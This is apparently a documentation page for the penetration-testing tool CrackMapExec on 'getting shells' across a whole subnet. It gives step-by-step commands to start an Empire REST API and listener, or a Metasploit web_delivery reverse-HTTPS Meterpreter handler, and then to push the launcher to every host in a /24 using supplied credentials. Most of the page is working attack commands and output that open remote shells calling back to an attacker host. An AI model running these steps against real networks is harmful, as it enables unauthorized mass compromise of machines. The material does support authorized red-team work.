Getting Shells 101

Getting Shells 101

We all love shells and that's why CME makes it as easy as possible to get them! There really is something magical about shelling a /24

Empire Agent

Use the new Empire in Python3 https://github.com/BC-SECURITY/Empire​
We can use the empire_exec module to execute an Empire Agent's initial stager. In the background, the module connects to Empire's RESTful API, generates a launcher for the specified listener and executes it.
  • First setup the rest API:
1
#~ python powershell-empire --rest --user empireadmin --pass Password123!
2
[*] Loading modules from: /home/byt3bl33d3r/Tools/Empire/lib/modules/
3
* Starting Empire RESTful API on port: 1337
4
* RESTful API token: l5l051eqiqe70c75dis68qjheg7b19di7n8auzml
5
* Running on https://0.0.0.0:1337/ (Press CTRL+C to quit)
Copied!
  • Second setup a listener:
1
(Empire: listeners) > set Name test
2
(Empire: listeners) > set Host 192.168.10.3
3
(Empire: listeners) > set Port 9090
4
(Empire: listeners) > set CertPath data/empire.pem
5
(Empire: listeners) > run
6
(Empire: listeners) > list
7
​
8
[*] Active listeners:
9
​
10
ID Name Host Type Delay/Jitter KillDate Redirect Target
11
-- ---- ---- ------- ------------ -------- ---------------
12
1 test http://192.168.10.3:9090 native 5/0.0
13
​
14
(Empire: listeners) >
Copied!
The username and password that CME uses to authenticate to Empire's RESTful API are stored in the cme.conf file located at ~/.cme/cme.conf:
1
[Empire]
2
api_host=127.0.0.1
3
api_port=1337
4
username=empireadmin
5
password=Password123!
6
​
7
[Metasploit]
8
rpc_host=127.0.0.1
9
rpc_port=55552
10
password=abc123
Copied!
  • Then just run the empire_exec module and specify the listener name:
1
#~ crackmapexec 192.168.10.0/24 -u username -p password -M empire_exec -o LISTENER=test
Copied!
image

Meterpreter

We can use the metinject module launch a meterpreter using Invoke-MetasploitPayload Invoke-MetasploitPayload.ps1 script.
On your Metasploit instance, run the following commands
1
use exploit/multi/script/web_delivery
Copied!
The SRVHOST and SRVPORT variables are used for running the webserver to host the script
1
set SRVHOST 10.211.55
2
set SRVPORT 8443
Copied!
The target variable determines what type of script we're using. 2 is for PowerShell
1
set target 2
Copied!
Pick your payload. In this case, we'll use a reverse https meterpreter payload
1
set payload windows/meterpreter/reverse_https
2
set LHOST 10.211.55
3
set LPORT 443
Copied!
Run the exploit
1
run -j
Copied!
Once run, the web_delivery module will spin up the webserver to host the script and reverse listener for our meterpreter session.
1
msf exploit(web_delivery) > run -j
2
[*] Exploit running as background job.
3
​
4
[*] Started HTTPS reverse handler on https://10.211.55.4:8443/
5
[*] Using URL: http://10.211.55.4:8080/eYEssEwv2D
6
[*] Local IP: http://10.211.55.4:8080/eYEssEwv2D
7
[*] Server started.
Copied!
  • Then just run the met_inject module and specify the LHOST and LPORT values:
1
#~ crackmapexec 192.168.10.0/24 -u username -p password -M met_inject -o SRVHOST=192.168.10.3 SRVPORT=8443 RAND=eYEssEwv2D SSL=http
Copied!
​